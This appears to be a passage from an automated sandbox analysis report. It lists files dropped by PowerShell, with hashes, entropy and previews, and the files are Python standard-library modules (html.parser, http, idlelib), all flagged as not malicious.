                                                                                                                                                                                                              Preview:"""A parser for HTML and XHTML."""....# This file is based on sgmllib.py, but the API is slightly different.....# XXX There should be a way to distinguish between PCDATA (parsed..# character data -- the normal case), RCDATA (replaceable character..# data -- only char and entity references and end tags are special)..# and CDATA (character data -- only end tags are special).......import re..import _markupbase....from html import unescape......__all__ = ['HTMLParser']....# Regular expressions used for parsing....interesting_normal = re.compile('[&<]')..incomplete = re.compile('&[a-zA-Z#]')....entityref = re.compile('&([a-zA-Z][-.a-zA-Z0-9]*)[^a-zA-Z0-9]')..charref = re.compile('&#(?:[0-9]+|[xX][0-9a-fA-F]+)[^0-9a-fA-F]')....starttagopen = re.compile('<[a-zA-Z]')..piclose = re.compile('>')..commentclose = re.compile(r'--\s*>')..# Note:..# 1) if you change tagfind/attrfind remember to update locatestarttagend too;..# 2) if you change tagfind/attrfind and/or locatestarttagend the parser wi
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8508
                                                                                                                                                                                                              Entropy (8bit):5.096832707441712
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:VFcbQSi4+TbKatPR4qXiasXh+O5ZSsB3CeAXI5UKZYcLXhGsIU:VFFyqXiasXzgep5UKZYQsU
                                                                                                                                                                                                              MD5:C8809BF3CEE30939A61E235849DDFCFB
                                                                                                                                                                                                              SHA1:51CBA6DA7D66CCC0652D1A57190AB8484D533109
                                                                                                                                                                                                              SHA-256:420E7F74A3B5062B7CD1EB820962980FCCA3CDEA512C1FD6B641326F70A54F4E
                                                                                                                                                                                                              SHA-512:A8035C3DC101DD9A75723B5E7B46C43B7D4915AC75E0E2F6BA5821B29E1735F1A78088D07DAA38B49A3B3A5C732BB6F7D7C98F632882384B0D7665C9B3E738F0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from enum import StrEnum, IntEnum, _simple_enum....__all__ = ['HTTPStatus', 'HTTPMethod']......@_simple_enum(IntEnum)..class HTTPStatus:.. """HTTP status codes and reason phrases.... Status codes from the following RFCs are all observed:.... * RFC 7231: Hypertext Transfer Protocol (HTTP/1.1), obsoletes 2616.. * RFC 6585: Additional HTTP Status Codes.. * RFC 3229: Delta encoding in HTTP.. * RFC 4918: HTTP Extensions for WebDAV, obsoletes 2518.. * RFC 5842: Binding Extensions to WebDAV.. * RFC 7238: Permanent Redirect.. * RFC 2295: Transparent Content Negotiation in HTTP.. * RFC 2774: An HTTP Extension Framework.. * RFC 7725: An HTTP Status Code to Report Legal Obstacles.. * RFC 7540: Hypertext Transfer Protocol Version 2 (HTTP/2).. * RFC 2324: Hyper Text Coffee Pot Control Protocol (HTCPCP/1.0).. * RFC 8297: An HTTP Status Code for Indicating Hints.. * RFC 8470: Using Early Data in HTTP..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):9534
                                                                                                                                                                                                              Entropy (8bit):5.928087068885846
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:TsdArTB8kaKaNzpZOKDcxHN/812MHb4kvrneU5Wny:7MzpZOKDcpNG2c3v5Wny
                                                                                                                                                                                                              MD5:E5740594883FB6D0800B55E5149D8252
                                                                                                                                                                                                              SHA1:BAF2FDF74245DA2DA3F316FC3DD78DFA32E40A31
                                                                                                                                                                                                              SHA-256:EB2DC9763A307F50B21909287AF14B551EDA7DAF64E41B62B9665B7383729D92
                                                                                                                                                                                                              SHA-512:490FFC47C6529A619AD97C6C3DB38B7DF2B8181FEE7183061062FCB22CB0F3D45D570C661949B18818A709D8A8D45943C85EEC388E8A00EDD27ABBCD1DD2802F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...........e<!........................t.....d.d.l.m.Z.m.Z.m.Z...d.d.g.Z...e.e...........G.d...d.................Z...e.e...........G.d...d.................Z.y.)......)...StrEnum..IntEnum.._simple_enum..HTTPStatus..HTTPMethodc.....................`.....e.Z.d.Z.d.Z.dGd...Z.e.d...........Z.e.d...........Z.e.d...........Z.e.d...........Z.e.d...........Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z d.Z!d.Z"d Z#d!Z$d"Z%d#Z&d$Z'd%Z(d&Z)d'Z*d(Z+d)Z,d*Z-d+Z.d,Z/d-Z0d.Z1d/Z2d0Z3d1Z4d2Z5d3Z6d4Z7d5Z8d6Z9d7Z:d8Z;d9Z<d:Z=d;Z>d<Z?d=Z@d>ZAd?ZBd@ZCdAZDdBZEdCZFdDZGdEZHyF)Hr....aG...HTTP status codes and reason phrases.. Status codes from the following RFCs are all observed:.. * RFC 7231: Hypertext Transfer Protocol (HTTP/1.1), obsoletes 2616. * RFC 6585: Additional HTTP Status Codes. * RFC 3229: Delta encoding in HTTP. * RFC 4918: HTTP Extensions for WebDAV, obsoletes 2518. * RFC 5842: Binding Extensions to WebDAV. *
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):56902
                                                                                                                                                                                                              Entropy (8bit):5.2137338588970685
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:hG3VgCFg3B/soqIrS0Vo11Be2jlrHlUgbKO5SJUqViyD:hG3VgCFgp2+wuOKH
                                                                                                                                                                                                              MD5:7F0FD15E95559F17D0565ADBB9007DED
                                                                                                                                                                                                              SHA1:97C6F748EE0C9FAD67189296BAAE83C382699BE6
                                                                                                                                                                                                              SHA-256:9E69B0C2CCFC239423653E1F7CAB6F2A546CDC74675C75A938F8B3B71F5F7C4C
                                                                                                                                                                                                              SHA-512:FDBCCD25FE92CD3DEC3065C37C2418C5FEB0C02187C38117F966A04190F6792AC33713BDAC10A098ABBE20134F97FCE89AB672916CDF15C120443E9DF2DFE64A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...........e..........................b.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...g.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z...e.........j-..................e.j...................j0............................e.j...................j0..................j3..........................D...c.i.c.]...}.|.|.j4........................c.}.Z.d.Z.d.Z...e.j<..................d.........j>..................Z ..e.j<..................d.........jB..................Z"..e.j<..................d.........Z#..e.j<..................d.........Z$h.d...Z%d>d...Z&d.e'd.e'f.d...Z(..G.d...d.e.jR..................jT..........................Z+d...Z,e+f.d...Z-e+f.d...Z...G.d...d.e.j^..........................Z0d...Z1..G.d...d.........Z2..d.d.l3Z3..G.d ..d!e2........Z4e.jk..................d!............G.d"..d#e7........Z8..G.d$..d%e8........Z9..G.d&..d'e8........Z:..G.d(..d)e8........Z;..G.d*..d+e8........Z<..G.d,..d-e8........Z=..G.d...d/e8........Z>..G.d0..d1e8........Z?..G.d2..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):81662
                                                                                                                                                                                                              Entropy (8bit):5.402599481839976
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:2YyLT18X8niIS6n1LKP4aCKwI8DZGz7+p/soSe:2YysK1Rf7cmpEDe
                                                                                                                                                                                                              MD5:FB27AB27C9AEC1D16D563D24F914829A
                                                                                                                                                                                                              SHA1:CFDBA1C7ED63C96AAF3AEC48B9AFA4E1F4DD2ACE
                                                                                                                                                                                                              SHA-256:B25F129BE0E29FDCD51C1EC7CD6BBB4ECCBB7421A0EA3AB04B07D5DC6628DD89
                                                                                                                                                                                                              SHA-512:12E260ACBFF41EA1AC7E3A7B15F70AA6AAE84E01174CEA6F7349EC8000CF8E49AEFB16C14E4E9B11D7DAC5D4AB31B216D1B4D4A1F0E0ABA8E4D0889D96ECE2B0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...........e.6........................j.....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.Z.d.a.d...Z.d.Z.d.Z...e.e.j,..................j...........................Z...e.j2..................d.........Z.d.Z.d.Z.d...Z.d.Z.d...Z.g.d...Z g.d...Z!e!D...c.g.c.]...}.|.jE................................c.}.Z#dKd...Z$dKd...Z%d.d.d.d.d...Z&..e.j2..................d.e.jN..........................Z(d...Z)d...Z*..e.j2..................d.e.jN..........................Z+..e.j2..................d.e.jX..................e.jN..................z...........Z-..e.j2..................d.e.j\..................e.jN..................z...........Z/d...Z0..e.j2..................d.e.j\..................e.jN..................z...........Z1d...Z2d...Z3..e.j2..................d.........Z4..e.j2..................d.........Z5..e.j2..................d ........Z6..e.j2..................d!........Z7d"..Z8..e.j2..................d#........Z9d$..Z:d%..Z;d&..Z<..e.j2........
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):21579
                                                                                                                                                                                                              Entropy (8bit):5.425087182091203
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:ThqTxFfuySriLbb9fVyb2CVozo6o4GV+h3ysKCokVsHhEvl33/9:iTj9fVyb2CVozNo4GVrsLokVsBEvl331
                                                                                                                                                                                                              MD5:DEECB1F81E952A5B6A7AAC809B6EE7C5
                                                                                                                                                                                                              SHA1:1D7763C5D5BB7F10A7CDB8F38E92A327C94326E2
                                                                                                                                                                                                              SHA-256:8C1029761C4CC955CF293352F566AB5BC49653D1F26909A31556A1559FD570B8
                                                                                                                                                                                                              SHA-512:890A779115A648EE1AFF6FA20CEACE14653C538580FBA3CF472D362DC2F65F658C6F4B0E8E5BC7293562BBAA00E600809DAA857618AA4DFF38E9091351311440
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...........efR..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.j...................Z.d.j...................Z.d.j...................Z...G.d...d.e.........Z.e.j...................e.j...................z...d.z...Z.e.d.z...Z...e...e.d...................e...e.e.e.................z...D...c.i.c.]...}.|.d.|.z.........c.}.Z.e.j)....................e.d.........d...e.d.........d.i.............e.j*..................d...e.j,..................e.........z...........j...................Z.d...Z...e.j*..................d.........Z...e.j*..................d.........Z.d...Z.g.d...Z.g.d...Z.d.e.e.f.d...Z...G.d...d.e ........Z!d.Z"e"d.z...Z#..e.j*..................d.e"z...d.z...e#z...d.z...e.jH..................e.jJ..................z...........Z&..G.d ..d!e ........Z'..G.d"..d#e'........Z(y.c...c.}.w.)$a.....Here's a sample session to show how to use this module..At the moment, this is the only documentation...The Basics.----------..Importing is easy..... >>> from http import cookies..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):58623
                                                                                                                                                                                                              Entropy (8bit):4.4264268152656525
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:l3z+3hB5SQi1oScyNzBoVQOQBWhc4oHCL9uKRkstPU:l3z+3hB5SQi1oScyNzBoVQOQBWACL978
                                                                                                                                                                                                              MD5:7DB16F63DD2F1E2CBD38770EFD82F540
                                                                                                                                                                                                              SHA1:6ED81ABC88A0B20B622EB5CC9E2105D8902B1023
                                                                                                                                                                                                              SHA-256:D09ABC3FBD8AF7997AD0E22202B8D120A7827FB0F12DD0B0E6BCB9FC7F9EDA0F
                                                                                                                                                                                                              SHA-512:C0B36CA07B8349D596BE72E6B691944024A7D14054630B23E387AAE1B7C7F88045DDF4F4F0741E65E78C00DD52B48F2A1006F00F357311CFD6B09E8021C905EA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:r"""HTTP/1.1 client library....<intro stuff goes here>..<other stuff, too>....HTTPConnection goes through a number of "states", which define when a client..may legally make another request or fetch the response for a particular..request. This diagram details these state transitions:.... (null).. |.. | HTTPConnection().. v.. Idle.. |.. | putrequest().. v.. Request-started.. |.. | ( putheader() )* endheaders().. v.. Request-sent.. |\_____________________________.. | | getresponse() raises.. | response = getresponse() | ConnectionError.. v v.. Unread-response Idle.. [Response-headers-read].. |\____________________.. | |.. | response.read() | putrequest().. v v.. Idle Req-started-unread-response.. ______/|.. /
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):79559
                                                                                                                                                                                                              Entropy (8bit):4.460811276790579
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:Gsf53CLTKr88g99gZ5T2SLbzf7bbVbFVJRyx67NF:G0I7jgZ5ZD/ZFbRs6ZF
                                                                                                                                                                                                              MD5:104EE963A477A64AB8692C88CE98D57B
                                                                                                                                                                                                              SHA1:FCEB2607FA42C983BD9C3F3BFEAE8F2ACE1115C7
                                                                                                                                                                                                              SHA-256:F4C1FAC9A8323FAB6840BEECDA77C69F83FDD72F9345B3D8259C5CC1015FDA4E
                                                                                                                                                                                                              SHA-512:D0EFE42484B974807F3EC63B56FAA9E012F2F81D9E335304EFC9813F32D2606837DDD3D703DFBC1E2F133FEC42442F1619BA6DC2B8E35265D20693FA74D48973
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:r"""HTTP cookie handling for web clients.....This module has (now fairly distant) origins in Gisle Aas' Perl module..HTTP::Cookies, from the libwww-perl library.....Docstrings, comments and debug strings in this code refer to the..attributes of the HTTP cookie system as cookie-attributes, to distinguish..them clearly from Python attributes.....Class diagram (note that BSDDBCookieJar and the MSIE* classes are not..distributed with the Python standard library, but are available from..http://wwwsearch.sf.net/):.... CookieJar____.. / \ \.. FileCookieJar \ \.. / | \ \ \.. MozillaCookieJar | LWPCookieJar \ \.. | | \.. | ---MSIEBase | \.. | / | | \.. | / MSIEDBCookieJar BSDDBCookieJar.. |/.. MSIECookieJar...."""....__all__ = ['Cookie', 'Cook
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):21094
                                                                                                                                                                                                              Entropy (8bit):4.737928355464598
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:ShNUZtUx0dqJ1sJxttmT+tOVVyeuPFcLIcfOuu7jvxyXWNYN:ShNUZmx0dCsNPFGIcfyM+YN
                                                                                                                                                                                                              MD5:BB19E50B174A51A5972C7DFD8F142ADB
                                                                                                                                                                                                              SHA1:FE6E9FB17F72042FF2EF00FC6E7F5C51631D2F3C
                                                                                                                                                                                                              SHA-256:D049D9DE921DD9A2D13CD205FC0ABED14691CDDC8BA6F3C174653AF938ECD79F
                                                                                                                                                                                                              SHA-512:993B3238D231137B5E703FC4ADC0FD2A263A6EB7D07FDBFCA11DEEC422184A99C8ABAD6F2CE8F6A36C253D5967BAE8BA921261C636BE4F4B4A3B7D22A05EB27A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:####..# Copyright 2000 by Timothy O'Malley <timo@alum.mit.edu>..#..# All Rights Reserved..#..# Permission to use, copy, modify, and distribute this software..# and its documentation for any purpose and without fee is hereby..# granted, provided that the above copyright notice appear in all..# copies and that both that copyright notice and this permission..# notice appear in supporting documentation, and that the name of..# Timothy O'Malley not be used in advertising or publicity..# pertaining to distribution of the software without specific, written..# prior permission...#..# Timothy O'Malley DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS..# SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY..# AND FITNESS, IN NO EVENT SHALL Timothy O'Malley BE LIABLE FOR..# ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES..# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,..# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS..# ACTION, ARISING
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):49836
                                                                                                                                                                                                              Entropy (8bit):4.568587656018124
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:lfng3S+gSOsn6f0aKucGIEgA0BBrETVp5tU6N0Y+:lvg3S+7OsnQ0aKucGIEOBCTZN0Y+
                                                                                                                                                                                                              MD5:475B51062BC286BBFCEB982AC56F8EDF
                                                                                                                                                                                                              SHA1:B54CD3951C705D433363EB74C79CAB7158897691
                                                                                                                                                                                                              SHA-256:240BA27E5469B77E14BCD0F912F778FCFF79CFD423B281DAB0CDB1AC4BB0F32F
                                                                                                                                                                                                              SHA-512:2AD5D0345ACA53EC5C9C8040581F25B7E22AB5FC1F64EC8AC70B2C63ED3ECC1A4092776E8E75A14E874E9F3047274259B073F29412633B82ECD48C65BE32972C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""HTTP server classes.....Note: BaseHTTPRequestHandler doesn't implement any HTTP request; see..SimpleHTTPRequestHandler for simple implementations of GET, HEAD and POST,..and CGIHTTPRequestHandler for CGI scripts.....It does, however, optionally implement HTTP/1.1 persistent connections,..as of version 0.3.....Notes on CGIHTTPRequestHandler..------------------------------....This class implements GET and POST requests to cgi-bin scripts.....If the os.fork() function is not present (e.g. on Windows),..subprocess.Popen() is used as a fallback, with slightly altered semantics.....In all cases, the implementation is intentionally naive -- all..requests are executed synchronously.....SECURITY WARNING: DON'T USE THIS CODE UNLESS YOU ARE INSIDE A FIREWALL..-- it may execute arbitrary Python code or external programs.....Note that status code 200 is sent prior to execution of a CGI script, so..scripts cannot send other status codes such as 302 (redirect).....XXX To do:....- log requests even
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines (573), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):57951
                                                                                                                                                                                                              Entropy (8bit):5.181417187054118
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:DBUthcU0dh7J3DmWwyOyXRinU4kAjLQr3v5MFZmTQiUb0DB87fRhSQ0c8eeYIjIv:V5AxpMK4057PSn/YSIN9
                                                                                                                                                                                                              MD5:284F4D79C220ACF4D5F6310555146371
                                                                                                                                                                                                              SHA1:EF2FE85A7FE07F6D195E358FFF722AFF20F266C6
                                                                                                                                                                                                              SHA-256:C4EBD1900BC9AAC681B38AFDFE01716194E2A50B23547817626023AF543B40CC
                                                                                                                                                                                                              SHA-512:EDB5E8C93F9403645E9AC459CE0DE2A35929B6F4AE065CCEE286D1C70CE65C35F9ED4F007377BF1250D86B2FE4E06CE289023EDC18FA796642115FB515E10DC9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:Please refer to the IDLEfork and IDLE CVS repositories for..change details subsequent to the 0.8.1 release.......IDLEfork ChangeLog..==================....2001-07-20 11:35 elguavas.....* README.txt, NEWS.txt: bring up to date for 0.8.1 release....2001-07-19 16:40 elguavas.....* IDLEFORK.html: replaced by IDLEFORK-index.html....2001-07-19 16:39 elguavas.....* IDLEFORK-index.html: updated placeholder idlefork homepage....2001-07-19 14:49 elguavas.....* ChangeLog, EditorWindow.py, INSTALLATION, NEWS.txt, README.txt,...TODO.txt, idlever.py:...minor tidy-ups ready for 0.8.1 alpha tarball release....2001-07-17 15:12 kbk.....* INSTALLATION, setup.py: INSTALLATION: Remove the coexist.patch...instructions.....**************** setup.py:.....Remove the idles script, add some words on IDLE Fork to the...long_description, and clean up some line spacing.....2001-07-17 15:01 kbk.....* coexist.patch: Put this in the attic, at least for now.......2001-07-17 14:59 kbk.....* PyShell.py, idle, idle
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):9582
                                                                                                                                                                                                              Entropy (8bit):4.3788666144076105
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:NHJWAibAZ3vIggkEfc54pjuXv+e3ZLbaQBYDAWa:NHJWAibAp8E54Nqv+g0Ax
                                                                                                                                                                                                              MD5:24D5CA8A7B072FE0524D2009A422F84D
                                                                                                                                                                                                              SHA1:C7F057B1B9B6473FB9D54D09CC7D650A6ADB5466
                                                                                                                                                                                                              SHA-256:D6863E5703612857B03BC44CE9E5C591B24BBAA02EADE5900664E9D87217DF10
                                                                                                                                                                                                              SHA-512:0E282AD040D11CDB600B62DDFEFCDF6EB7255C1308546F417F678809EB5009BBA19D5F67431FBFF752A666CF9550F3F33558A47D0C8B2C29888F5B8E13503E46
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Complete either attribute names or file names.....Either on demand or after a user-selected delay after a key character,..pop up a list of candidates..."""..import __main__..import keyword..import os..import string..import sys....# Modified keyword list is used in fetch_completions...completion_kwds = [s for s in keyword.kwlist.. if s not in {'True', 'False', 'None'}] # In builtins...completion_kwds.extend(('match', 'case')) # Context keywords...completion_kwds.sort()....# Two types of completions; defined here for autocomplete_w import below...ATTRS, FILES = 0, 1..from idlelib import autocomplete_w..from idlelib.config import idleConf..from idlelib.hyperparser import HyperParser....# Tuples passed to open_completions...# EvalFunc, Complete, WantWin, Mode..FORCE = True, False, True, None # Control-Space...TAB = False, True, True, None # Tab...TRY_A = False, False, False, ATTRS # '.' for attributes...TRY_F = False, Fal
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):21361
                                                                                                                                                                                                              Entropy (8bit):4.539417169910206
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:Op3Uer4VcMKcW+1kv3iBgFVVIVOTym/wucFEG/r62/uYxy91a/4af/uNTjKfM/A4:Op3Ue21qKBgFkOTUfO1Yok4Vs0xn
                                                                                                                                                                                                              MD5:FE13E7068C967CC9FF5669BE6D205A45
                                                                                                                                                                                                              SHA1:0AEBB8052D43C950DC16717945713CB2B2AB4EC9
                                                                                                                                                                                                              SHA-256:3D88D2B736871D3302CF31EAF785D02C0A2D9ACD4B23F1B088857BBD2F2BAFA8
                                                                                                                                                                                                              SHA-512:70C5536E3C044B9DD579EFC483FA900EBFEEA83A69E4A86559F5A2FFC12F0EBA0D47770ABDBF1AAF1EF16B4B5C383B9C0186DA6EC9A3B87A1CB8319D7ABB0176
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""..An auto-completion window for IDLE, used by the autocomplete extension.."""..import platform....from tkinter import *..from tkinter.ttk import Scrollbar....from idlelib.autocomplete import FILES, ATTRS..from idlelib.multicall import MC_SHIFT....HIDE_VIRTUAL_EVENT_NAME = "<<autocompletewindow-hide>>"..HIDE_FOCUS_OUT_SEQUENCE = "<FocusOut>"..HIDE_SEQUENCES = (HIDE_FOCUS_OUT_SEQUENCE, "<ButtonPress>")..KEYPRESS_VIRTUAL_EVENT_NAME = "<<autocompletewindow-keypress>>"..# We need to bind event beyond <Key> so that the function will be called..# before the default specific IDLE function..KEYPRESS_SEQUENCES = ("<Key>", "<Key-BackSpace>", "<Key-Return>", "<Key-Tab>",.. "<Key-Up>", "<Key-Down>", "<Key-Home>", "<Key-End>",.. "<Key-Prior>", "<Key-Next>", "<Key-Escape>")..KEYRELEASE_VIRTUAL_EVENT_NAME = "<<autocompletewindow-keyrelease>>"..KEYRELEASE_SEQUENCE = "<KeyRelease>"..LISTUPDATE_SEQUENCE = "<B1-ButtonRelease>"..WINCONFIG_SEQUENCE = "<Configure>
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3312
                                                                                                                                                                                                              Entropy (8bit):4.279209000194862
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:2HKgz99V1AqotPoGbuGpMM+LEFsuIpqD/cIZMNsHFNjL6EFbStFsHBM5sZ+VMabi:2LzXV1AquP3l+xczTLo6oHyaXtitFRj
                                                                                                                                                                                                              MD5:3630277C433B2C3C1E20ADD3DCC40D47
                                                                                                                                                                                                              SHA1:0C75883D09F33A3A4B19EC4827FEF1224F55687E
                                                                                                                                                                                                              SHA-256:EEC10FFD8D460FB90AAA61FB286F25F982793DF124A55D52A92B34A0B15C3F4C
                                                                                                                                                                                                              SHA-512:4CB79DFB8C7017CD46127B352B06BD8DC29E47CD87B599D1C2BFF5FF0F13DC17945075F00D4AF9DF290346D433851F186330E2F5AE3D2C65F8627A1253C24696
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:'''Complete the current word before the cursor with words in the editor.....Each menu selection or shortcut key selection replaces the word with a..different word with the same prefix. The search for matches begins..before the target and moves toward the top of the editor. It then starts..after the cursor and moves down. It then returns to the original word and..the cycle starts again.....Changing the current text line or leaving the cursor in a different..place before requesting the next selection causes AutoExpand to reset..its state.....There is only one instance of Autoexpand...'''..import re..import string......class AutoExpand:.. wordchars = string.ascii_letters + string.digits + "_".... def __init__(self, editwin):.. self.text = editwin.text.. self.bell = self.text.bell.. self.state = None.... def expand_word_event(self, event):.. "Replace the current word with the next expansion.".. curinsert = self.text.index("insert").. curli
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8848
                                                                                                                                                                                                              Entropy (8bit):4.482264147714743
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:UeViezbUGVbdUMKb/8bTzlPXUqVlYDwOKjAbmputuyLWv9LKH6uAStRw7dv:Uu3DUx0bT1nYDTQLHVKRASTGl
                                                                                                                                                                                                              MD5:2117516807ED2A852A294579D24D1E9A
                                                                                                                                                                                                              SHA1:EC0B31850734EBFDBAB0A42A270198FF555EDBD4
                                                                                                                                                                                                              SHA-256:9B7FB874BDC94408D6B3A8579235783C53EB56EEA39B43C6C81B24290CC9D3C2
                                                                                                                                                                                                              SHA-512:6F11524C67CA287723F8DA12763156C065BD6FA1A080816BC848E9F9518AC52D6633C6BF67CA15293ED5CFBB00952E8FCD3AB249A2C823B58C2ABF0189DF5591
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Module browser.....XXX TO DO:....- reparse when source changed (maybe just a button would be OK?).. (or recheck on window popup)..- add popup menu with more options (e.g. doc strings, base classes, imports)..- add base classes to class browser tree.."""....import os..import pyclbr..import sys....from idlelib.config import idleConf..from idlelib import pyshell..from idlelib.tree import TreeNode, TreeItem, ScrolledCanvas..from idlelib.util import py_extensions..from idlelib.window import ListedToplevel......file_open = None # Method...Item and Class...Item use this...# Normally pyshell.flist.open, but there is no pyshell.flist for htest.....# The browser depends on pyclbr and importlib which do not support .pyi files...browseable_extension_blocklist = ('.pyi',)......def is_browseable_extension(path):.. _, ext = os.path.splitext(path).. ext = os.path.normcase(ext).. return ext in py_extensions and ext not in browseable_extension_blocklist......def transform_children(child_
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7472
                                                                                                                                                                                                              Entropy (8bit):4.503050253535362
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:buoYb91LYFSc1ynoGbGeUuw1oyEQrb70CLaghdrA+O6SjnD+E/OFaUiI+DFqSXLS:dMLy31yFGjuk3FLrrAf6SjjlI+BTXLQ5
                                                                                                                                                                                                              MD5:CDB87B1F5E3DB590CBA8293ECB7E785A
                                                                                                                                                                                                              SHA1:525FEBCDE7F56C32581435C94BDF391ECB941DC5
                                                                                                                                                                                                              SHA-256:7E24FC65B0DFE9B0ABFBB0DEA97AB222098AA978F85F2E79A2AC56FF92F5BB2A
